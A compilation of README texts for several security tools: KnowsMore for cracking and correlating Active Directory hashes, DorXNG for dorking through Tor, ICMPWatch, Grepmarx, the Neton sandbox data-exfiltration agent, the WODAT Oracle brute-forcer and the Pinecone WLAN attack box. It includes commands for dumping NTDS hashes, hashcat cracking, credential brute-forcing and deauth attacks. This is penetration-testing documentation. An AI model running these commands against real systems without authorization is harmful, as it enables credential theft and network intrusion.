KnowsMore officially supports Python 3.8+.
knowsmore --stats
This command produces several password statistics, like the output below:
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db
[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+
[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+
[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+
pip3 install --upgrade knowsmore
Note: If you face problems with dependency versions, check the Virtual ENV file.
There is no mandatory order for importing data, but for better data correlation we suggest the following execution flow:
All data are stored in a SQLite database:
knowsmore --create-db
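For quick inspection, the database can be opened with Python's built-in sqlite3 module. A minimal sketch, assuming the default knowsmore.db filename (the table layout will vary with the KnowsMore version):
import sqlite3

# Open the KnowsMore database (default filename: knowsmore.db)
conn = sqlite3.connect("knowsmore.db")

# List all tables to explore the schema
for (name,) in conn.execute(
    "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
):
    print(name)

conn.close()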
KnowsMore can import full BloodHound files, correlate the data, and sync it to the Neo4j BloodHound database. This means you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.
# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip
# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json
Note: KnowsMore can import both BloodHound ZIP files and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.
# Sync imported data to the Neo4j database
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678
Note: The KnowsMore implementation of bloodhound-importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy brings several benefits, such as being at least 10x faster than the original BloodHound user interface.
Import hashes and clear-text passwords directly from NTDS.dit and the SYSTEM registry hive:
knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM
Note: Alternatively, first use secretsdump to extract the NTDS hashes with the command below:
secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name
After that, import the result:
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
Generate a custom wordlist based on the company name:
knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name
First, extract all hashes to a text file:
# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"
# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
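The cut one-liner above relies on the secretsdump output format (domain\user:rid:lmhash:nthash:::). If you prefer to filter in a script, a rough Python equivalent (the file paths are just the examples used above):
from pathlib import Path

# Example paths matching the commands above
src_path = Path.home() / "Desktop" / "client_name.ntds"
dst_path = Path("ntlm_hashes.txt")

with src_path.open() as src, dst_path.open("w") as dst:
    for line in src:
        fields = line.strip().split(":")
        if len(fields) >= 4:
            dst.write(fields[3] + "\n")  # 4th field: the NT hash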
To crack the hashes, I usually use hashcat with the commands below:
# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"
# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt
Note: Change clientCompanyName to the name of your company.
As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and respective hashes.
Note: This command will keep all generated statistics and imported user data.
knowsmore --wipe
During an assessment you may find user passwords in several ways; you can add them to the KnowsMore database:
knowsmore --user-pass --username administrator --password Sec4US@2023
# Or, add the company name
knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us
Integrate all cracked credentials with the Neo4j BloodHound database:
knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456
For remote connections, make sure the Neo4j database server accepts remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service:
server.bolt.listen_address=0.0.0.0:7687
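To verify the server accepts remote bolt connections before syncing, a quick check with the official neo4j Python driver may help. A minimal sketch, reusing the host and credentials from the examples above:
from neo4j import GraphDatabase

URI = "bolt://10.10.10.10:7687"   # host from the examples above
AUTH = ("neo4j", "12345678")      # credentials from the examples above

driver = GraphDatabase.driver(URI, auth=AUTH)
try:
    driver.verify_connectivity()  # raises if unreachable or auth fails
    print("Neo4j is reachable")
finally:
    driver.close()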
DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose-built containerized image of SearXNG, a self-hosted, hackable, privacy-focused meta-search engine.
Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client-side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.
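For reference, circuit refreshing is controlled by a standard Tor option; a torrc directive along these lines (a sketch of the setting described above, not necessarily the project's exact configuration) rotates circuits every ten seconds:
# torrc: stop reusing a circuit once it is 10 seconds old
MaxCircuitDirtiness 10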
The DorXNG client application is written in Python 3 and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.
We have enabled every supported upstream search engine that allows advanced search operator queries:
Google
DuckDuckGo
Qwant
Bing
Brave
Startpage
Yahoo
For more information about which search engines SearXNG supports, see: Configured Engines
Install DorXNG
git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h
Download and run our custom SearXNG Docker container (at least one). Multiple SearXNG instances can be used; use the --serverlist option with DorXNG. See: server.lst
docker run researchanddestroy/searxng:latest
If you would like to build the container yourself:
git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>
By default, DorXNG has a hard-coded server variable in parse_args.py, which is set to the IP address that Docker will assign to the first container you run on your machine (172.17.0.2). This can be changed, or overridden with --server or --serverlist.
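Conceptually, that default behaves like an ordinary argparse default; a hypothetical sketch (the names and URL are illustrative, not DorXNG's actual code):
import argparse

parser = argparse.ArgumentParser()
# Hypothetical default mirroring the hard-coded server variable:
# Docker usually assigns 172.17.0.2 to the first container on a host
parser.add_argument("-s", "--server",
                    default="https://172.17.0.2/search",
                    help="SearXNG instance to query")

args = parser.parse_args([])  # no CLI arguments -> the default is used
print(args.server)            # https://172.17.0.2/search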
Start Issuing Search Queries
./DorXNG.py -q 'search query'
Query the DorXNG Database
./DorXNG.py -D 'regex search string'
-h, --help show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: --limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Verbose Output - Displays Raw JSON Output
Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. Most often, the more passes you make over a search query, the more results you'll find.
Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project, after all.
Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries, this generates a lot of upstream requests... So have patience.
Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename; the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations separate, it's there for you.
Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time, the longer it takes to receive results. It also increases the likelihood of receiving HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.
If you start multiple SearXNG Docker containers too rapidly, Tor connections may fail to establish. While initializing a container, watch the Tor connectivity check output (STDOUT in the container). If HTTP/500 response codes come back from the SearXNG monitor script, kill the Docker container and spin up a new one. HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes; this means the SearXNG instance did not receive a valid response back within one minute. That specific Tor circuit is probably too slow. Just keep going!
There really isn't a reason to run a ton of these containers... Yet... How many you run really depends on what you're doing. Each container uses approximately 1.25 GB of RAM.
Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.
Running multiple containers is nice because each has its own Tor circuit that's refreshing every 10 seconds.
When running in --serverlist mode, disable the --timeout feature so there is no delay between requests (the default delay interval is 4 seconds).
Keep in mind that the more containers you run, the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit. The more recursions your command goes through without returning to main, the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens, your machine ran out of memory and killed the process. Not to worry though... Your database file is still good.
If your database file gets exceptionally large, it inevitably slows down the program and consumes more memory with each iteration... Those Python stack frames are thicc...
We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.
The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.
Once you have a series of database files, you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.
The included query.lst file contains every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py
We've already run through it for you... Our ghdb.db file contains over one million entries and counting! You can download it (ghdb.db) if you'd like a copy.
Example of querying the ghdb.db database:
./DorXNG.py -d ghdb.db -D '^http.*\.sql$'
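SQLite has no built-in regex operator, so a regex query like this is typically applied from Python. A conceptual sketch of the idea (the table and column names are hypothetical, not DorXNG's actual schema):
import re
import sqlite3

pattern = re.compile(r"^http.*\.sql$")

conn = sqlite3.connect("ghdb.db")
# Hypothetical schema: a "results" table with a "url" column
for (url,) in conn.execute("SELECT url FROM results"):
    if pattern.search(url):
        print(url)
conn.close()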
A rewrite of DorXNG in Golang is already in the works. (GorXNG? | DorXNGNG?)
We're gonna need more dorks... Check out DorkGPT.
Single Search Query
./DorXNG.py -q 'search query'
Concurrent Search Queries
./DorXNG.py -q 'search query' -c4
Page Iteration Mode
./DorXNG.py -q 'search query' -n4
Iterative Concurrent Search Queries
./DorXNG.py -q 'search query' -c4 -n64
Server List Iteration Mode
./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0
Query List Iteration Mode
./DorXNG.py -Q query.lst -c4 -n64
Query and Server List Iteration
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0
Main Function Loop Iteration Mode
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4
Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10
Merging a Database (One at a Time) into a New Database File
./DorXNG.py -d new-database.db -m dorxng.db
Merge All Database Files in the Current Working Directory into a New Database File
for db in *.db; do ./DorXNG.py -d new-database.db -m "$db"; done
Query a Database
./DorXNG.py -d new-database.db -D 'regex search string'
ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
git clone https://github.com/HalilDeniz/ICMPWatch.git
pip install -r requirements.txt
python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
-v or --verbose: Show verbose packet details.
-t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
-f or --filter: BPF filter for packet sniffing (default is "icmp").
-o or --output: Output file to save captured packets.
--type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
--src-ip: Source IP address to filter.
--dst-ip: Destination IP address to filter.
-i or --interface: Network interface to capture packets (required).
-db or --database: Store captured packets in an SQLite database.
-c or --capture: Capture file to save packets in pcap format.
Press Ctrl+C to stop the sniffing process.
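Under the hood this kind of tool is a filtered packet sniff; for intuition, a minimal scapy-based sketch of the core capture loop (a simplified illustration, not ICMPWatch's actual source; requires root):
from scapy.all import ICMP, IP, sniff

def show_icmp(pkt):
    # Print source, destination and ICMP type for each captured packet
    if pkt.haslayer(ICMP) and pkt.haslayer(IP):
        print(f"{pkt[IP].src} -> {pkt[IP].dst}  ICMP type={pkt[ICMP].type}")

# BPF filter "icmp" and a 300-second timeout mirror the defaults above
sniff(iface="eth0", filter="icmp", prn=show_icmp, timeout=300)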
# Capture ICMP packets on interface eth0
python icmpwatch.py -i eth0
# Save captured packets to an output file
python icmpwatch.py -i eth0 -o icmp_results.txt
# Filter by source and destination IP
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
# Capture only Echo Request packets (type 8)
python icmpwatch.py -i eth0 --type 8
# Save packets in pcap format
python icmpwatch.py -i eth0 -c captured_packets.pcap
Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.
SAST (Static Analysis Security Testing) capabilities:
SCA (Software Composition Analysis) capabilities:
Extra
Scan customization | Analysis workbench | Rule pack edition
Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.
Make sure you have docker-compose installed on the system and that the Docker daemon is running. The application can then easily be executed in a Docker container. The steps:
Get the code
$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx
Start the app in Docker
$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d
Visit http://localhost:5000 in your browser. The app should be up & running.
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).
Install using pip
$ pip install gunicorn supervisor
Start the app using the gunicorn binary
$ supervisord -c supervisord.conf
Visit http://localhost:8001 in your browser. The app should be up & running.
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Get the code
$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx
Create a virtualenv and activate it
$ virtualenv env
$ source env/bin/activate
Install Python modules
$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt
Install additional requirements
# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan
A Redis server is required to queue security scans. Install the redis package with your favorite distro package manager, then:
$ redis-server
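Before starting the Celery worker, you can sanity-check that Redis is reachable; a minimal sketch with the redis-py client, assuming the default localhost:6379:
import redis

r = redis.Redis()   # default connection: localhost:6379, database 0
print(r.ping())     # True if the Redis server is up and reachable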
Set the FLASK_APP environment variable
$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development
Start the celery worker process
$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach
Start the application (development mode)
$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000
Access grepmarx in your browser: http://127.0.0.1:5000/
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Grepmarx - Provided by Orange Cyberdefense.
Neton is a tool for gathering information from Internet-connected sandboxes. It is composed of an agent and a web interface that displays the collected information.
The Neton agent gathers information from the systems on which it runs and exfiltrates it via HTTPS to the web server.
Some of the information it collects:
All this information can be used to improve Red Team artifacts or to learn how sandboxes work and improve them.
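For intuition, HTTPS exfiltration of collected data boils down to a POST to the collection server. A conceptual sketch in Python (the endpoint URL and payload fields are hypothetical; the actual agent is a C# application configured in Program.cs):
import platform
import requests

# Hypothetical payload: a few host details an agent might collect
payload = {
    "hostname": platform.node(),
    "os": platform.platform(),
}

# Hypothetical endpoint; verify=False only because the server setup
# below uses a self-signed certificate
requests.post("https://neton.example.com/api/exfil",
              json=payload, verify=False, timeout=10)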
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 manage.py migrate
python3 manage.py makemigrations core
python3 manage.py migrate core
python3 manage.py createsuperuser
python3 manage.py runserver
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout server.key -out server.crt
Launch gunicorn:
./launch_prod.sh
Build the solution with Visual Studio. The agent configuration can be done in the Program.cs class.
In the sample data folder there is a SQLite database with several samples collected from the following services:
To access the sample information, copy the SQLite file to the NetonWeb folder and run the application.
Credentials:
raccoon
jAmb.Abj3.j11pmMa
A simple port of the popular Oracle Database Attack Tool (ODAT) (https://github.com/quentinhardy/odat) to C# .NET Framework. Credit to https://github.com/quentinhardy/odat, as much of the functionality is ported from his code.
I take no responsibility for your use of this software. Development is done in my personal capacity and carries no affiliation with my work.
The general command line arguments required are as follows:
wodat.exe COMMAND ARGUMENTS
COMMAND (ALL, BRUTECRED, BRUTESID, BRUTESRV, TEST, DISC)
-server:XXX.XXX.XXX.XXX -port:1520
-sid:AS OR -srv:AS
-user:Peter -pass:Password
To test if a specific credential set works:
wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan
See the outline of modules for further usage. The tool will always first check whether the targeted TNS listener works.
The module performs a wordlist-based SID guessing attack; if not successful, it will offer a brute-force attack.
wodat.exe BRUTESID -server:XXX.XXX.XXX.XXX -port:1521
The module performs a wordlist-based ServiceName guessing attack; if not successful, it will offer a brute-force attack.
wodat.exe BRUTESRV -server:XXX.XXX.XXX.XXX -port:1521
The module performs a wordlist-based password attack. The following options exist:
A - username:password combo list with no credentials given in the arguments
B - username list with the password given in the arguments
C - password list with the username given in the arguments
D - username as password, with a username list provided
To perform a basic attack with a given file that contains username:password combos:
wodat.exe BRUTECRED -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE
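For illustration, the combo-list mode amounts to attempting one Oracle logon per line. A rough Python sketch of the same idea using the python-oracledb driver (the file name and DSN are examples; WODAT itself is C# and uses Oracle.ManagedDataAccess):
import oracledb

DSN = "10.10.10.10:1521/XE"  # example host:port/service

# combos.txt: one username:password pair per line (example file)
with open("combos.txt") as f:
    for line in f:
        user, _, password = line.strip().partition(":")
        try:
            conn = oracledb.connect(user=user, password=password, dsn=DSN)
        except oracledb.DatabaseError:
            continue  # logon failed; try the next combo
        print(f"[+] Valid credentials: {user}:{password}")
        conn.close()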
The module tests whether the given connection string can connect successfully.
wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan
The module will perform discovery against a provided CIDR range or a file with instances. Note: only instances with valid TNS listeners will be returned. Testing a network range will be much faster, as it's processed in parallel.
wodat.exe DISC
Instances to test must be formatted as per the below example targets.txt:
192.168.10.1
192.168.10.5,1521
Not implemented yet.
Not implemented yet.
You can grab an automated release build from the GitHub Actions, or build it yourself using the following commands:
nuget restore wodat.sln
msbuild wodat.sln -t:rebuild -property:Configuration=Release
Some general notes: the Oracle.ManagedDataAccess.dll library will have to be copied alongside the binary. I'm looking at ways of embedding it.
Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.
This tool is designed for educational and research purposes only. Only use it with explicit permission.
For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:
Python 3 (apt-get install python3)
dnsmasq (apt-get install dnsmasq)
hostapd-wpe (apt-get install hostapd-wpe). If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.
After installing the necessary packages, you can install the Python package requirements for Pinecone by running pip3 install -r requirements.txt in the project root folder.
For starting Pinecone, execute python3 pinecone.py
from within the project root folder:
root@kali:~/pinecone# python3 pinecone.py
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >
Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:
pinecone > help
Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias
Undocumented commands:
======================
back run stop
pinecone > help use
Usage: use module [-h]
Interact with the specified module.
positional arguments:
module module ID
optional arguments:
-h, --help show this help message and exit
Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of currently loaded modules:
pinecone > use
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >
Every module has options, which can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):
pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)
When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:
pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...
If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop command while the module is running. To deactivate the current module and return to the main prompt, use the back command. You can also activate another module by issuing the use command again. Shell commands may be executed with the shell command or the ! shortcut:
pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md
Currently, the Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs are stored in the tmp/ directory, also under the project root folder.